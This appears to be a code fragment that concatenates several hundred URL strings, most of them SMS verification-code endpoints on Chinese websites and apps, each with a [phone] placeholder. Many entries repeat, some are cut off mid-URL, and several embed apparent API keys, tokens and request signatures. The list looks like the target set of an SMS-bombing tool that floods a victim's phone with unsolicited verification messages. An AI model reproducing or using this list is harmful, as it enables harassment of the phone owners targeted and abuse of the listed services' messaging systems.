"http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App%20Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "https://app.webuy.ai/greatsale/user/sendAuthCode?mobile=[phone]", + "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", + "http://passport.58.com/mobileauthcodelogin/getcode?valIDAtecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=%E5%B8%8C%E6%B2%83%E5%AD%A6%E9%99%A2SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=+86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&package=sxrqowww.com&version=1.6.9&token=384e798aee87f24f4a228a41df049e27&type=1&timestamp=1567400876&sign=9726d9876bd9e1bbc5667eeadd28e42b", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://passport.csdn.net/account/mobileregister?action=sendMobileCode&mobile=[phone]", + "http://www.hx2car.com/mobile/loginCode.json?code=d889c6084be2613b8ed976d2336bc53a&devicetoken=0FAEEA4E-B279-4409-93A6-05B4EDE49DE8&phoNum=[phone]", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://user.hundun.cn/get_identify_code?clientType=pcweb&versionName=&imei=&net=&phone=[phone]&source=verify", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", + "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]&app_id=29&_=1580993309093", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://admin.bolemeng.com/index.php/api/Common/sms?callback=jQuery21102979887340557068_1582428078445&phone=[phone]&type=register&_=1582428078447", + "http://shxd.jienihua100.com/api/user/getcode?mobile=[phone]&regcode=AC04B8AE-5A73-41D1-8694-3EFD04FEB059", + "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://yinyu.leanapp.cn/tools/getNum?&phone=[phone]&sign=4ee234df92d36632c5a7082399b9890a&timestamp=1567136457", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", + "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", + "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", + "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%23%2Fuser%2Flogin&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%2", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]&imgcode=&token=aa315477956d459f40b6f26c9090b790&sendtype=mobilemsgpwd&msgtype=1&captchaVersion=2&user_domain=cc&business_domain=&hpuid=924-ECmHmDZ0xdhMnXe-43&callback=reqwest_1589532775907030687", + "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&PhoneNO=[phone]&AppVersion=6357251", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", + "http://www.zkzcfu.cn/api/sms/send?mobile=[phone]&event=register", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", + "https://www.guiji.ai/market/sms?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", + "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", + "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=%2B86-[ph", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.faka866.com/index/checkuser?Mobile=[phone]&act=sj_reg_telma&t=1589617288409", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://dxhz.xqapi.live/api.php?id=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]&sign=d012c7dbfeba6014a28b9093156cd52d&ts=1565428712975901&type=1", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]&_=1535534872440", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://case.100.com/captcha?source=57&mobile=[phone]&resend=0&mkey=customer", + "http://api.huatu.com/lumenapi/v4/common/message/send_by_java?callback=callbackSendCode&mobile=[phone]&_=1547130695671", + "https://beacons.gcp.gvt2.com/domainreliability/upload", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.xyqb.com/LKB/lg/sendSms.html?random=&loginName=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", + "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8%2C1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", + "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", + "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]&hasSend=0", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=%2B86&mobile=[phone]", + "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=%E9%87%8D%E5%BA%86%E5%B8%82&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://wx.fowep.com/iwater/v1/usercenter/nt/sendAuthCode/v2.json?requestPara=%7B%22mobile%22:%22[phone]%22,%22type%22:1,%22token%22:null,%22waterCorpId%22:3,%22UNID%22:%22%22,%22areaId%22:0,%22accountType%22:%22XJ%22,%22apiType%22:%22PC%22,%22appVersion%22:%221.0.2%22%7D", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "http://uac.10010.com:80/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://exmail.qq.com:80/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=%2B86&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", + "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8,1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", + "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "http://www.1314.buzz/index.php?hm=[phone]", + "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&AppVersion=6357251&PhoneNO=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]&_=1523359575414", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]&needcode=false", + "http://api.sssc.cn/seccode/reg?callback=&m=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]", + "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", + "http://ccyagu.gswanzhong.com:80/Apicloud/User/sendCaptcha?Mobile=[phone]", + "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", + "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", + "http://www.milvwang.com/user/isRegister/?mobile_phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", + "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", + "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://wskh.newone.com.cn/newlogincontroller/getrandompassword?mobile=[phone]", + "http://doc.u-ease.com:80/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567899", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://shxd.jienihua100.com/api/user/getcode?mobile=[phone]&regcode=AC04B8AE-5A73-41D1-8694-3EFD04FEB059", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://gw.dianzhenkeji.com/userc/sms/[phone]/2?tenantId=dxtv", + "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", + "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", + "http://wwww.0cskj.top/api.php?act=user&key=L747V6vp26fVFuvp0&phone=[phone]", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://photograph.yuanlikj.cn/send/Send?appName=%E6%88%AA%E5%9B%BE%E7%A7%80-%E5%AF%B9%E8%AF%9D%E7%94%9F%E6%88%90%E5%99%A8&TELMobile=[phone]", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", + "https://beacons.gcp.gvt2.com/domainreliability/upload", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + 